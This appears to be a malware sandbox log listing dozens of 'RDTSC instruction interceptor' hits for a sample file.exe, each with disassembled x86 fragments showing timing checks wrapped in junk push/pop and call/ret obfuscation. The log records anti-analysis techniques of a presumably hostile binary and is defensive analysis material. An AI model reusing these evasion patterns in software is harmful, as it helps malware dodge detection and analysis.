Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B610BE second address: B61116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F35AD45B558h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 0000001Ah 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 jne 00007F35AD45B55Bh 0x00000026 push 00000003h 0x00000028 sub dword ptr [ebp+122D30A3h], eax 0x0000002e push 00000000h 0x00000030 or dword ptr [ebp+122D2470h], edx 0x00000036 push 00000003h 0x00000038 call 00007F35AD45B559h 0x0000003d pushad 0x0000003e pushad 0x0000003f jg 00007F35AD45B556h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61116 second address: B6111E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6111E second address: B6112A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6112A second address: B6112E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6112E second address: B61138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61138 second address: B61169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F35AD0C7245h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F35AD0C723Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61169 second address: B6116F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6116F second address: B61179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F35AD0C7236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61179 second address: B611FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F35AD45B55Fh 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F35AD45B558h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c add ecx, 104077FFh 0x00000032 lea ebx, dword ptr [ebp+12457EA4h] 0x00000038 sbb esi, 38A31DE9h 0x0000003e xchg eax, ebx 0x0000003f jo 00007F35AD45B56Dh 0x00000045 pushad 0x00000046 jmp 00007F35AD45B55Fh 0x0000004b jo 00007F35AD45B556h 0x00000051 popad 0x00000052 push eax 0x00000053 pushad 0x00000054 push edi 0x00000055 jmp 00007F35AD45B560h 0x0000005a pop edi 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B611FC second address: B61200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61300 second address: B6134E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F35AD45B558h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 jnc 00007F35AD45B56Ch 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 pushad 0x00000023 jmp 00007F35AD45B55Fh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B613B9 second address: B613DC instructions: 0x00000000 rdtsc 0x00000002 je 00007F35AD0C7244h 0x00000008 jmp 00007F35AD0C723Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F35AD0C7238h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B613DC second address: B61475 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F35AD45B55Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D31D2h], esi 0x00000011 push 00000000h 0x00000013 add dword ptr [ebp+122D2630h], ebx 0x00000019 push 26D14DBAh 0x0000001e jmp 00007F35AD45B563h 0x00000023 xor dword ptr [esp], 26D14D3Ah 0x0000002a pushad 0x0000002b adc edi, 1E097366h 0x00000031 mov dx, 74B7h 0x00000035 popad 0x00000036 add dword ptr [ebp+122D1930h], edi 0x0000003c push 00000003h 0x0000003e mov di, 08A1h 0x00000042 or dword ptr [ebp+122D3062h], esi 0x00000048 push 00000000h 0x0000004a and edi, dword ptr [ebp+122D1CF1h] 0x00000050 pushad 0x00000051 push ecx 0x00000052 call 00007F35AD45B566h 0x00000057 pop edx 0x00000058 pop edi 0x00000059 or ax, AAEEh 0x0000005e popad 0x0000005f push 00000003h 0x00000061 jmp 00007F35AD45B55Ah 0x00000066 push FE1992C0h 0x0000006b pushad 0x0000006c push edi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61475 second address: B614B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F35AD0C7242h 0x0000000b popad 0x0000000c xor dword ptr [esp], 3E1992C0h 0x00000013 jmp 00007F35AD0C723Ch 0x00000018 lea ebx, dword ptr [ebp+12457EB8h] 0x0000001e or dword ptr [ebp+122D248Bh], ecx 0x00000024 xchg eax, ebx 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 jns 00007F35AD0C7236h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B614B6 second address: B614DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F35AD45B567h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73E97 second address: B73E9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73E9B second address: B73EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54EB7 second address: B54EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7FFCF second address: B7FFF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B55Eh 0x00000007 jg 00007F35AD45B556h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push esi 0x00000011 jns 00007F35AD45B55Ch 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8014B second address: B80151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80151 second address: B80156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80156 second address: B8016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD0C7245h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8016F second address: B80185 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jo 00007F35AD45B556h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802B4 second address: B802BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802BA second address: B802BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802BF second address: B802C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802C4 second address: B802E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F35AD45B55Ch 0x00000011 jg 00007F35AD45B556h 0x00000017 jng 00007F35AD45B55Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802E3 second address: B802E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802E7 second address: B802EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802EE second address: B802F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802F9 second address: B802FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B808B3 second address: B808B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80A0B second address: B80A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80A11 second address: B80A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80A19 second address: B80A2C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F35AD45B55Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80E56 second address: B80E60 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F35AD0C7236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80E60 second address: B80E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F35AD45B565h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80FF1 second address: B81008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7243h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81008 second address: B81010 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81010 second address: B81016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81611 second address: B81617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81774 second address: B81778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81778 second address: B8177E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81A5B second address: B81A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81A73 second address: B81A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81A7B second address: B81ABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7245h 0x00000007 jmp 00007F35AD0C7247h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F35AD0C725Dh 0x00000016 js 00007F35AD0C7242h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81ABB second address: B81AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81DAA second address: B81DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81DB2 second address: B81DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81DB8 second address: B81DCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7240h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58415 second address: B5841A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87C7E second address: B87C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87C8A second address: B87C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87C8E second address: B87C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B869EA second address: B869EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B869EE second address: B86A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F35AD0C7242h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86A0A second address: B86A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD45B567h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B871E6 second address: B87202 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F35AD0C7236h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jnp 00007F35AD0C7240h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C93C second address: B4C940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E3B3 second address: B4E3BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E3BF second address: B4E3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CD1B second address: B8CD21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CD21 second address: B8CD27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CE5B second address: B8CE61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CE61 second address: B8CE71 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F35AD45B55Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CE71 second address: B8CE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7245h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CE8A second address: B8CE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D001 second address: B8D017 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F35AD0C7236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F35AD0C723Ch 0x00000010 jo 00007F35AD0C7236h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D625 second address: B8D629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D629 second address: B8D631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F39B second address: B8F3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F35AD45B55Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F3A9 second address: B8F3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jbe 00007F35AD0C7254h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F3B9 second address: B8F3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F7D0 second address: B8F7DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FC76 second address: B8FC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9025C second address: B90260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90260 second address: B9026A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F35AD45B556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9026A second address: B9028C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F35AD0C7236h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B904DD second address: B904E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90751 second address: B90757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90757 second address: B9075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B907DF second address: B90806 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F35AD0C724Ah 0x00000013 jmp 00007F35AD0C7244h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90806 second address: B9080B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91728 second address: B9172C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9172C second address: B91739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91739 second address: B91744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F35AD0C7236h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91744 second address: B9174A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95234 second address: B95281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F35AD0C7236h 0x0000000a popad 0x0000000b nop 0x0000000c adc si, 23D9h 0x00000011 push 00000000h 0x00000013 jmp 00007F35AD0C723Dh 0x00000018 push 00000000h 0x0000001a je 00007F35AD0C723Eh 0x00000020 pushad 0x00000021 clc 0x00000022 mov eax, 74BFB4E1h 0x00000027 popad 0x00000028 movsx esi, dx 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007F35AD0C7245h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95281 second address: B9528A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96920 second address: B9692B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F35AD0C7236h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9739A second address: B973A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ED32 second address: B9ED37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ED37 second address: B9ED47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD45B55Ch 0x00000009 rdtsc
